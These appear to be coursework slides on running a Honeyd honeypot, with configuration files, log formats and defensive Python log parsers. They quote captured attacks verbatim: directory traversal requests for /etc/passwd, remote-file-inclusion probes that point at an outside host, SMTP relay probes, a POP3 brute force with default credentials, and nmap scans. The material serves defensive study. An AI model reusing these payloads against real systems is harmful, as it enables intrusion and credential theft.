Using Honeypots with Honeyd

Description: coursework on implementing honeypots with Honeyd (Pedro Pereira, Ulisses Costa, 18 December 2008; uploaded by ulisses-costa on 18 Dec 2014).

TRANSCRIPT

Page 1: Using Honeypots with Honeyd

Using Honeypots with Honeyd

Pedro Pereira, Ulisses Costa

Cryptography and Information Systems Security

18 December 2008

Pedro Pereira, Ulisses Costa Using Honeypots with Honeyd

Page 2: Using Honeypots with Honeyd

Outline

1 Introduction: Honeypots; Honeyd

2 Log: Honeyd's main log

3 SMTP: Open mail relay

4 HTTP: webcollage/1.135a; Directory traversal; Morfeus Scanner (WebCalendar, Mambo/Joomla, Preventing Morfeus Scanner attacks); Attack on POP3; SSH

5 The threat


Page 4: Using Honeypots with Honeyd

What are honeypots?

Decoy systems or programs that emulate known vulnerabilities (services, hosts or whole networks) and serve no production purpose, so any traffic they receive is suspect by definition

Traps used to detect, study or deter attacks

Page 5: Using Honeypots with Honeyd

Types of honeypots

By level of interaction

High-interaction (a real system the attacker can fully compromise) / Low-interaction (emulated services, as with Honeyd)

By mode of operation

Server (waits for attackers to connect to it) / Client (actively visits malicious servers)


Page 7: Using Honeypots with Honeyd

Honeyd

Creation of virtual hosts (each with its own IP address, answered at the network level)

Per-host configuration

Support for more than 1000 personalities (OS fingerprints, so a port scanner's OS detection sees the emulated operating system)

Many dozens of scripts for service emulation

Page 8: Using Honeypots with Honeyd

Honeyd configuration

farpd answers ARP requests for the honeypot address on eth0, so that frames destined for 192.168.1.50 reach the machine running honeyd:

bash> farpd 192.168.1.50 -i eth0

# File: /etc/default/honeyd
# Defaults for honeyd initscript
# Run as a daemon
RUN="yes"
# Network interface on which honeyd listens for requests
INTERFACE="eth0"
# Network (here a single address) that honeyd simulates
NETWORK=192.168.1.50
# Option set
# -c hostname:port:username:password (report statistics to honeydstats)
OPTIONS="-c localhost:12345:username:password"

Page 9: Using Honeypots with Honeyd

The -c hostname:port:username:password option

Generation of partial statistics with honeydstats (honeyd reports to it over the socket given with -c; the credentials must match the ones in honeydstats.conf):

bash> honeydstats --os_report /etc/honeypot/os --port_report /etc/honeypot/port \
  --spammer_report /etc/honeypot/spam --country_report /etc/honeypot/country \
  -f /etc/honeypot/honeydstats.conf -l localhost -p 12345

# File: /etc/honeypot/honeydstats.conf
# honeydstats configuration file
username:password

Page 10: Using Honeypots with Honeyd

Honeypot configuration (1/2)

# File: /etc/honeypot/honeyd.conf
# Honeypot configuration: one template, win2k, bound to the address below
create win2k
set win2k personality "Microsoft Windows 2000 SP2"
set win2k default tcp action reset
set win2k default udp action reset
set win2k default icmp action block
set win2k uptime 3567
add win2k tcp port 21 "sh /usr/share/honeyd/scripts/win32/win2k/msftp.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 23 "perl /usr/share/honeyd/scripts/unix/linux/suse7.0/telnetd.sh"
add win2k tcp port 25 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-smtp.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 80 "sh /usr/share/honeyd/scripts/win32/win2k/iis.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 110 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-pop3.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 143 "sh /usr/share/honeyd/scripts/win32/win2k/exchange-imap.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 389 "sh /usr/share/honeyd/scripts/win32/win2k/ldap.sh $ipsrc $sport $ipdst $dport"
add win2k tcp port 5901 "sh /usr/share/honeyd/scripts/win32/win2k/vnc.sh $ipsrc $sport $ipdst $dport"
add win2k udp port 161 "perl /usr/share/honeyd/scripts/unix/general/snmp/fake-snmp.pl public private --config=scripts/unix/general"

Page 11: Using Honeypots with Honeyd

Honeypot configuration (2/2)

# NetBIOS/SMB ports: proxied straight back to the source address
add win2k udp port 137 proxy $ipsrc:137
add win2k udp port 138 proxy $ipsrc:138
add win2k udp port 445 proxy $ipsrc:445
add win2k tcp port 137 proxy $ipsrc:137
add win2k tcp port 138 proxy $ipsrc:138
add win2k tcp port 139 proxy $ipsrc:139
add win2k tcp port 445 proxy $ipsrc:445
bind 192.168.1.50 win2k

Monitoring the NetBIOS ports was not feasible: emulating them is too complex

Decision: proxy those connections back to the source (each attacker ends up talking to its own NetBIOS ports)

Anything not listed above falls under the template defaults: TCP and UDP are answered with a reset, ICMP is dropped

Starting our honeypot:

bash> /etc/init.d/honeyd start


Page 13: Using Honeypots with Honeyd

Files

/var/log/honeyd.txt    SMTP, Telnet, IMAP, POP3 service transcripts

/var/log/honeypot/web.log    HTTP requests

/var/log/honeypot/honeyd.log    Honeyd's main log (every connection and packet)


Page 15: Using Honeypots with Honeyd

Format of the /var/log/honeypot/honeyd.log file

Date  Protocol  T  SrcIP  SrcPort  DstIP  DstPort  Info  Comment

T is the record type: S = start of a connection, E = end of a connection, - = a single packet that belongs to no tracked connection. For "-" records Info holds the packet size and, for TCP, the flags; the comment in brackets is the passive OS fingerprint of the source.

... tcp(6)   S 88.44.123.210   3637  ... 139 [Windows XP SP1]
... tcp(6)   S 82.155.0.49     22617 ... 139
... tcp(6)   E 82.155.1.160    4399  ... 445: 0 0
... tcp(6)   - 82.155.122.18   61582 ... 139: 40 R
... icmp(1)  - 80.236.5.27           ... : 3(13): 56
... tcp(6)   - 82.154.64.174   34507 ... 445: 40 RA
... tcp(6)   - 124.8.74.33     1806  ... 25: 70 FPA [Windows XP SP1]
... tcp(6)   - 168.167.152.228 58274 ... 445: 52 FA [Windows XP SP1]
... tcp(6)   - 168.167.152.228 58274 ... 445: 52 FA
... tcp(6)   - 82.155.57.245   58274 ... 445: 52 PA [Windows XP SP1]
... tcp(6)   - 193.136.19.149  58274 ... 445: 52 PA
... tcp(6)   - 88.175.73.149   4332  ... 139: 40 R [Windows XP SP1]
... tcp(6)   - 82.155.137.139  1230  ... 445: 40 A [Windows XP SP1]
... tcp(6)   - 82.155.7.176    2794  ... 445: 40 A
... tcp(6)   - 82.155.116.238  3578  ... 23: 60 S [Linux 2.6.1-7]
... tcp(6)   - 124.207.41.198  48804 ... 23: 40 S
... udp(17)  - 192.168.1.254   67    ... 68: 298

Date format: 2008-12-15-22:59:03.4039

DstIP is always the same (in this case): 192.168.1.50

Page 16: Using Honeypots with Honeyd

Format of the /var/log/honeypot/honeyd.log file

2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008

For TCP and UDP connections not every packet is recorded

That would be far too verbose

Only the amount transmitted is logged: the E record carries the two byte counts, first what was received from the remote side, then what the honeypot sent back (here 150 bytes of HTTP request in, 1008 bytes of response out)
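The record layout above is regular enough to parse mechanically. The following is an added example, not code from the slides: a parser for honeyd's main log that recognises S, E and "-" records and builds a per-source summary (connections per port, bytes received, ports touched by lone packets, OS fingerprints). SAMPLE is constructed from the slides' lines, with the elided date and destination filled in; the order of the two byte counts on an E record (received, then sent) is inferred from the slides' examples.

```python
# Added example (not code from the slides): a parser for honeyd's main log in the
# layout shown above, plus a per-source summary. SAMPLE is constructed from the
# slides' lines, with the elided date and destination filled in (192.168.1.50).
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(
    r"^(?P<date>\S+)\s+(?P<proto>[a-z]+)\((?P<pnum>\d+)\)\s+(?P<type>[SE-])\s+"
    r"(?P<src>\d+\.\d+\.\d+\.\d+)(?:\s+(?P<sport>\d+))?\s+"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)(?:\s+(?P<dport>\d+))?"
    r"(?::\s*(?P<info>[^\[]*?))?\s*(?:\[(?P<os>[^\]]+)\])?\s*$"
)

SAMPLE = """\
2008-12-15-22:59:03.4039 tcp(6) S 88.44.123.210 3637 192.168.1.50 139 [Windows XP SP1]
2008-12-15-22:59:05.1200 tcp(6) E 82.155.1.160 4399 192.168.1.50 445: 0 0
2008-12-15-22:59:06.0001 tcp(6) - 82.155.122.18 61582 192.168.1.50 139: 40 R
2008-12-15-22:59:07.0002 icmp(1) - 80.236.5.27 192.168.1.50: 3(13): 56
2008-12-15-22:59:08.0003 tcp(6) - 124.8.74.33 1806 192.168.1.50 25: 70 FPA [Windows XP SP1]
2008-12-15-22:59:09.0004 udp(17) - 192.168.1.254 67 192.168.1.50 68: 298
2009-01-01-05:57:28.0971 tcp(6) S 79.25.93.226 46984 192.168.1.50 80
2009-01-01-05:58:40.3750 tcp(6) E 79.25.93.226 46984 192.168.1.50 80: 150 1008
2009-01-01-05:58:41.0000 tcp(6) - 82.155.122.18 61583 192.168.1.50 445: 40 S
2009-01-01-05:58:42.0000 tcp(6) - 82.155.122.18 61584 192.168.1.50 23: 40 S
"""


def parse_line(line):
    """Return one record as a dict, or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    rec = {
        "date": d["date"], "proto": d["proto"], "type": d["type"],
        "src": d["src"], "sport": int(d["sport"]) if d["sport"] else None,
        "dst": d["dst"], "dport": int(d["dport"]) if d["dport"] else None,
        "info": (d["info"] or "").strip(), "os": d["os"],
    }
    if rec["type"] == "E":
        # On an E record Info is "<bytes received> <bytes sent>"; the order is
        # inferred from the slides' examples (150-byte request in, 1008-byte reply out).
        recv, sent = rec["info"].split()[:2]
        rec["bytes_in"], rec["bytes_out"] = int(recv), int(sent)
    return rec


def summarise(text):
    """Per-source view: connections opened per port, bytes sent to us, ports
    touched by lone packets (a spread of those is a scan), OS fingerprints."""
    conns = Counter()
    bytes_in = Counter()
    probed = defaultdict(set)
    os_seen = {}
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["os"]:
            os_seen[rec["src"]] = rec["os"]
        if rec["type"] == "S":
            conns[(rec["src"], rec["dport"])] += 1
        elif rec["type"] == "E":
            bytes_in[rec["src"]] += rec["bytes_in"]
        elif rec["proto"] in ("tcp", "udp"):
            probed[rec["src"]].add(rec["dport"])
    return {
        "connections": dict(conns),
        "bytes_in": dict(bytes_in),
        "probed_ports": {src: sorted(ports) for src, ports in probed.items()},
        "os": os_seen,
    }


if __name__ == "__main__":
    for key, value in summarise(SAMPLE).items():
        print(key, value)
```

The "-" records are the useful ones for spotting scanners: a source that touches several different ports with single SYNs (82.155.122.18 in the sample) never completed a connection, so it appears nowhere in the S/E records and would be invisible to the service scripts' own logs.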


Page 18: Using Honeypots with Honeyd

SMTP

Used on the server side to send messages (submission by clients and relaying between mail servers)

To retrieve messages, POP3 or IMAP is used

Page 19: Using Honeypots with Honeyd

SMTP honeypot

Page 20: Using Honeypots with Honeyd

The EHLO command in SMTP

The command with which a client identifies itself (by host name) and asks the server to list the extensions it supports

Page 21: Using Honeypots with Honeyd

The EHLO command in SMTP

S: 220 bps-pc9.local.mynet Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at Sex Jan 9 22:10:11 WET 2009
C: EHLO windows
S: 250-bps-pc9.local.mynet Hello [12]
S: 250-TURN
S: 250-ATRN
S: 250-SIZE
S: 250-ETRN
S: 250-PIPELINING
S: 250-DSN
S: 250-ENHANCEDSTATUSCODES
S: 250-8bitmime
S: 250-BINARYMIME
S: 250-CHUNKING
S: 250-VRFY
S: 250-X-EXPS GSSAPI NTLM LOGIN
S: 250-X-EXPS=LOGIN
S: 250-AUTH GSSAPI NTLM LOGIN
S: 250-AUTH=LOGIN
S: 250-X-LINK2STATE
S: 250-XEXCH50
S: 250 OK

Clients identify themselves with names that are not real domain names (here simply "windows")

Page 22: Using Honeypots with Honeyd

Spam on SMTP servers

Page 23: Using Honeypots with Honeyd

Solutions

EHLO [host]

Check whether the name given in EHLO resolves in DNS (and, ideally, whether it matches the connecting address) before accepting mail


Page 25: Using Honeypots with Honeyd

Attacks

Open relay check: the scanner sends a message addressed to itself through the honeypot; if the message arrives, the honeypot is an open relay (only the envelope and the subject are shown here; the addresses were redacted in the slides, and the HELO argument is a bare IP address rather than a resolvable host name)

HELO 82.155.248.223
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223

2008-12-11-09:45:27.9566 tcp(6) S 124.11.193.219 2774 192.168.1.50 25 [Windows XP SP1]
2008-12-11-09:46:33.6989 tcp(6) E 124.11.193.219 2774 192.168.1.50 25: 178 920

Page 26: Using Honeypots with Honeyd

Attacks

The same probe from another source. The first connections receive nothing from the client (0 bytes in: banner grabbing only); two hours later the same host comes back and sends the 177-byte relay probe over two parallel connections.

HELO 82.155.251.32
MAIL FROM:<[email protected]>
RCPT TO:<[email protected]>
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.251.32

2008-12-23-12:18:11.3939 tcp(6) S 114.44.42.34 2748 192.168.1.50 25 [Windows XP SP1]
2008-12-23-12:18:11.3953 tcp(6) S 114.44.42.34 2750 192.168.1.50 25 [Windows XP SP1]
2008-12-23-12:18:12.1966 tcp(6) E 114.44.42.34 2750 192.168.1.50 25: 0 116
2008-12-23-12:18:13.1996 tcp(6) E 114.44.42.34 2748 192.168.1.50 25: 0 232
2008-12-23-12:21:55.1773 tcp(6) S 114.44.42.34 3347 192.168.1.50 25 [Windows XP SP1]
2008-12-23-12:21:57.1324 tcp(6) E 114.44.42.34 3347 192.168.1.50 25: 0 232
2008-12-23-14:06:30.5003 tcp(6) S 114.44.42.34 1634 192.168.1.50 25 [Windows XP SP1]
2008-12-23-14:06:30.5023 tcp(6) S 114.44.42.34 1635 192.168.1.50 25 [Windows XP SP1]
2008-12-23-14:06:43.0390 tcp(6) E 114.44.42.34 1635 192.168.1.50 25: 177 335
2008-12-23-14:06:51.4612 tcp(6) E 114.44.42.34 1634 192.168.1.50 25: 177 418

Page 27: Using Honeypots with Honeyd

Attacks

A spam message submitted through the honeypot (note the forged Received: header naming the honeypot as the relaying host and the empty display name in From:)

HELO 82.155.103.147
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Received: from ([145.200.201.114])
	by 82.155.103.147 id <9624303-98482>;
	Tue, 06 Jan 2009 21:16:04 -0100
Message-ID: <w58$6a4j1fqc6q@ocjc8ujvz>
From: "" <[email protected]>
To: <[email protected]>
Subject: BC_82.155.103.147
Date: Tue, 06 Jan 09 21:16:04 GMT
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_000D_01C2CC60.49F4EC70"
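The two checks the SMTP section proposes (does the HELO/EHLO name resolve, and is the client asking us to relay to a domain that is not ours) can be run over a session transcript before any 250 OK is issued. The following is an added example, not code from the slides: it parses the envelope of a captured session and flags it. The resolver is passed in as a function so the example runs offline (in production pass socket.gethostbyname); LOCAL_DOMAINS, the resolver's table and the two sessions are constructed for the example, with the relay probe modelled on the one shown above.

```python
# Added example (not code from the slides): the two checks the SMTP section
# suggests, applied to a captured session. The resolver is passed in as a
# function so the example runs offline; in production pass socket.gethostbyname.
# LOCAL_DOMAINS, fake_resolve's table and the two sessions are constructed.
import ipaddress
import re

LOCAL_DOMAINS = {"local.mynet"}          # domains this server accepts mail for
ADDR_RE = re.compile(r"<([^>]*)>")       # address inside MAIL FROM:<...> / RCPT TO:<...>

PROBE = """HELO 82.155.248.223
MAIL FROM:<scanner@example.org>
RCPT TO:<relaytest@example.org>
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223
"""

LEGIT = """EHLO mail.example.net
MAIL FROM:<alice@example.net>
RCPT TO:<bob@local.mynet>
DATA
"""


def fake_resolve(name):
    """Stand-in for DNS: constructed table, raises like gethostbyname on a miss."""
    table = {"mail.example.net": "203.0.113.10"}
    if name in table:
        return table[name]
    raise OSError("cannot resolve " + name)


def parse_envelope(session):
    """HELO/EHLO argument, MAIL FROM address and RCPT TO addresses of a session."""
    helo, mail_from, rcpts = None, None, []
    for line in session.splitlines():
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        if cmd in ("HELO", "EHLO"):
            helo = arg.strip()
        elif cmd == "MAIL":
            m = ADDR_RE.search(arg)
            mail_from = m.group(1) if m else None
        elif cmd == "RCPT":
            m = ADDR_RE.search(arg)
            if m:
                rcpts.append(m.group(1))
        elif cmd == "DATA":
            break                      # envelope complete; the rest is the message
    return helo, mail_from, rcpts


def helo_resolves(helo, resolve):
    """True only for a host name the resolver can look up. A bare IP address
    (with or without RFC 5321 brackets) is never a 'real' host name here."""
    if not helo:
        return False
    name = helo.strip("[]")
    try:
        ipaddress.ip_address(name)
        return False
    except ValueError:
        pass
    try:
        resolve(name)
        return True
    except OSError:
        return False


def is_relay_attempt(rcpts):
    """An unauthenticated client asking us to deliver to a domain that is not
    ours is asking us to relay; an open relay says yes, we should answer 550."""
    return any(addr.rpartition("@")[2].lower() not in LOCAL_DOMAINS for addr in rcpts)


def classify(session, resolve=fake_resolve):
    helo, _mail_from, rcpts = parse_envelope(session)
    flags = []
    if not helo_resolves(helo, resolve):
        flags.append("helo-unresolvable")
    if is_relay_attempt(rcpts):
        flags.append("relay-attempt")
    return flags


if __name__ == "__main__":
    print("probe:", classify(PROBE))    # ['helo-unresolvable', 'relay-attempt']
    print("legit:", classify(LEGIT))    # []
```

Rejecting address literals outright is a policy choice (RFC 5321 permits "[1.2.3.4]" in EHLO); the point the slides make is that spammers and relay scanners typically identify with names that do not resolve at all, and that check costs one DNS lookup per session.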


Page 29: Using Honeypots with Honeyd

HTTP hits


Page 31: Using Honeypots with Honeyd

User agent: webcollage/1.135a

--MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,
"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
User-Agent: webcollage/1.135a
Referer: http://random.yahoo.com/fast/ryl
Host: www.morgangirl.com
",
--ENDMARK--

An attempt to fetch an image through the honeypot: the request line carries an absolute URL (GET http://... rather than GET /path), which is how a client talks to an HTTP proxy

The honeypot had probably been "seen" by an open-proxy scanner

The honeypot is being used as if it were an open proxy


Page 33: Using Honeypots with Honeyd

Directory traversal

Also known as the dot-dot-slash attack (../)

Exploits insufficient validation of the requested path

Target: system files outside the web root

Plain form of the request:
GET ../../../../../../../../../../etc/passwd HTTP/1.1

As logged (URL-encoded; the same scanner sends several encodings in a row):
--MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,
"GET %2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--

Page 34: Using Honeypots with Honeyd

Directory traversal

GET .../../../../../../../../../../etc/passwd HTTP/1.1

--MARK--,"Sun Jan 4 05:20:58 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59711,80,
"GET %2E%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--

Page 35: Using Honeypots with Honeyd

Directory traversal

GET ..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd HTTP/1.1

--MARK--,"Sun Jan 4 05:21:02 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59727,80,
"GET %2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2F%2E%2E%5C%2Fetc%5C%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--

Page 36: Using Honeypots with Honeyd

Directory traversal

GET ..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1

--MARK--,"Sun Jan 4 05:21:04 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59740,80,
"GET %2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--

Page 37: Using Honeypots with Honeyd

Directory traversal

GET //etc/passwd HTTP/1.1

--MARK--,"Sun Jan 4 05:20:59 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59700,80,
"GET %2F%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
Connection: close
Host: 82.155.127.187
",
--ENDMARK--

Page 38: Using Honeypots with Honeyd

Conclusion

Not successful against the honeypot

Low-interaction system: there is no file system behind the emulated IIS to traverse

Our honeypot answered every variant with "302 Object moved"

The attacker used the Nmap Scripting Engine (User-Agent: Nmap NSE), which tries the encoding variants above one after another within a few seconds


Page 40: Using Honeypots with Honeyd

Morfeus Scanner

Looks for PHP vulnerabilities

Known, already published vulnerabilities, probed by requesting the vulnerable URLs

Page 41: Using Honeypots with Honeyd

Morfeus Scanner - WebCalendar

Application for creating online calendars

Vulnerability in the file send_reminders.php: the request tries to make the script include code from a remote URL through the includedir parameter (remote file inclusion)

--MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,
"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--

Page 42: Using Honeypots with Honeyd

Morfeus Scanner - Mambo/Joomla

Very well known CMSs

The attacker tries to set the mosConfig_absolute_path variable of index.php to a remote URL, again a remote file inclusion attempt (the same 217.20.172.129/twiki/a.gif payload as in the WebCalendar probe)

--MARK--,"Wed Dec 24 16:07:34 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55438,80,
"GET /shop/index.php?option=com_registration&task=register//boutique/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--

Page 43: Using Honeypots with Honeyd

Preventing Morfeus Scanner attacks

One way to block this type of attack coming from MFS is to add the following lines to the ".htaccess" file in the website's folder (Apache with mod_rewrite enabled):

# Start of .htaccess change.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]
# End of .htaccess change.

Every request whose User-Agent starts with "Morfeus" is answered with 403 Forbidden

Caveat: the User-Agent is chosen by the attacker, so this only stops the scanner's default configuration; the real fix is for the application never to build include paths from request parameters (and, in PHP, to keep allow_url_include=Off)


Page 45: Using Honeypots with Honeyd

Brute-force attempt on the POP3 server

Page 46: Using Honeypots with Honeyd

Brute-force attempt on the POP3 server

One connection per USER/PASS pair, all from 91.189.83.181, roughly one per second:

...
--MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,
"USER root
PASS root
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:49 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54729,110,
"USER root
PASS root1
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:50 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54731,110,
"USER staff
PASS staff
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:52 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,
"USER root
PASS 12345
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:53 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54774,110,
"USER www
PASS www
",
--ENDMARK--
...
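Both the HTTP records in the previous pages (open-proxy request, directory traversal, the Morfeus remote file inclusion probes) and the POP3 records above share the same --MARK-- / --ENDMARK-- record layout written by honeyd's service scripts, so one parser serves both. The following is an added example, not code from the slides: it parses those records, classifies each HTTP request (decoding the URL first, since the traversal probes arrive percent-encoded, and folding backslashes so the ..\ variants are caught) and counts USER/PASS attempts per source for POP3. SAMPLE_LOG is constructed from the slides' records, trimmed to the headers that matter; the tag names, the scanner User-Agent list and the brute-force threshold are choices made for the example.

```python
# Added example (not code from the slides): a parser for the --MARK-- records
# written by honeyd's service scripts (web.log for HTTP, the POP3 transcript
# above), with the HTTP classification discussed in the previous pages and a
# brute-force count for POP3. SAMPLE_LOG is constructed from the slides' records.
import re
from collections import defaultdict
from urllib.parse import unquote

REC_RE = re.compile(
    r'--MARK--,"(?P<date>[^"]*)","(?P<service>[^"]*)","(?P<src>[^"]*)","(?P<dst>[^"]*)",'
    r'(?P<sport>\d+),(?P<dport>\d+),\s*"(?P<payload>.*?)",\s*--END MARK--'.replace("END MARK", "ENDMARK"),
    re.S,
)
SCANNER_UAS = ("Morfeus Scanner", "Nmap NSE")   # User-Agents seen on the slides

SAMPLE_LOG = '''--MARK--,"Mon Dec 15 23:09:00 WET 2008","IIS/HTTP","92.240.68.152","192.168.1.50",56886,80,
"GET http://www.morgangirl.com/pics/land/land1.jpg HTTP/1.0
User-Agent: webcollage/1.135a
",
--ENDMARK--
--MARK--,"Sun Jan 4 05:20:57 WET 2009","IIS/HTTP","82.173.198.254","192.168.1.50",59706,80,
"GET %2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd HTTP/1.1
User-Agent: Nmap NSE
",
--ENDMARK--
--MARK--,"Wed Dec 24 16:07:29 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",54941,80,
"GET /webcalendar/tools/send_reminders.php?noSet=0&includedir=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
User-Agent: Morfeus Scanner
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:48 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54678,110,
"USER root
PASS root
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:49 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54729,110,
"USER root
PASS root1
",
--ENDMARK--
--MARK--,"Mon Dec 22 11:34:50 WET 2008","exchange/POP3","91.189.83.181","192.168.1.50",54731,110,
"USER staff
PASS staff
",
--ENDMARK--
'''


def parse_records(text):
    """Every --MARK-- ... --ENDMARK-- record as a dict of its fields."""
    return [m.groupdict() for m in REC_RE.finditer(text)]


def classify_http(payload):
    """Set of tags for one HTTP request payload (request line + headers)."""
    lines = payload.strip().splitlines()
    parts = lines[0].split() if lines else []
    target = parts[1] if len(parts) > 1 else ""
    headers = {}
    for h in lines[1:]:
        k, sep, v = h.partition(":")
        if sep:
            headers[k.strip().lower()] = v.strip()
    tags = set()
    if re.match(r"[a-z]+://", target, re.I):
        tags.add("proxy-request")         # absolute URI: client thinks we are a proxy
    path = unquote(target).replace("\\", "/")   # ..\ and ..\/ variants become ../
    if "../" in path or "/etc/passwd" in path:
        tags.add("directory-traversal")
    for param in target.partition("?")[2].split("&"):
        if re.match(r"(https?|ftp)://", unquote(param.partition("=")[2]), re.I):
            tags.add("remote-file-inclusion")   # an include path pointed at a remote URL
    if headers.get("user-agent", "").startswith(SCANNER_UAS):
        tags.add("known-scanner-ua")
    return tags


def pop3_attempts(records):
    """USER/PASS pairs per source address, in log order."""
    attempts = defaultdict(list)
    for r in records:
        if not r["service"].endswith("POP3"):
            continue
        user = password = None
        for line in r["payload"].splitlines():
            cmd, _, arg = line.strip().partition(" ")
            if cmd.upper() == "USER":
                user = arg
            elif cmd.upper() == "PASS":
                password = arg
        if user is not None:
            attempts[r["src"]].append((user, password))
    return dict(attempts)


def brute_force_sources(records, threshold=3):
    """Sources with at least `threshold` login attempts (threshold is arbitrary)."""
    return sorted(s for s, a in pop3_attempts(records).items() if len(a) >= threshold)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    for r in recs:
        if r["service"].endswith("HTTP"):
            print(r["src"], sorted(classify_http(r["payload"])))
    print("POP3 brute force from:", brute_force_sources(recs))
```

Decoding before matching is the part that matters: a filter that looks for the literal string "../" in the raw request misses every one of the encoded variants the Nmap script sent.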


Page 48: Using Honeypots with Honeyd

SSH

Here is a graph showing the usernames attempted:

Page 49: Using Honeypots with Honeyd

SSH

And the following graph shows the passwords attempted:


Page 51: Using Honeypots with Honeyd

The threat

Page 52: Using Honeypots with Honeyd

Port scanning

Discovering hosts and the ports they have open

Crafting custom packets

Hard to master

Nmap - insecure.org

Page 53: Using Honeypots with Honeyd

Port scanning

Open or Accepted: the host answered indicating that a service is listening on that port;

Closed, Denied or Not Listening: the host answered indicating that any connection to that port will be refused (for TCP, a RST);

Filtered, Dropped or Blocked: no answer from the host at all (the probe was dropped, usually by a firewall).

Page 54: Using Honeypots with Honeyd

Port scanning

Types of technique

TCP SYN (half-open: send a SYN, read the answer, never complete the handshake; needs raw sockets)

TCP connect (full three-way handshake through the operating system's socket API; needs no privileges, but the connection is visible to the service and its logs)

UDP

Page 55: Using Honeypots with Honeyd

TCP connect

Page 56: Using Honeypots with Honeyd

Port scanning

Optimisation

golden@golden-laptop:~$ sudo nmap -sS -sV 192.168.100.0/24
...
Nmap finished: 256 IP addresses (29 hosts up) scanned in 2033.375 seconds
golden@golden-laptop:~$ sudo nmap -sS -sV -P0 192.168.100.0/24
...
Nmap finished: 256 IP addresses (32 hosts up) scanned in 2038.191 seconds

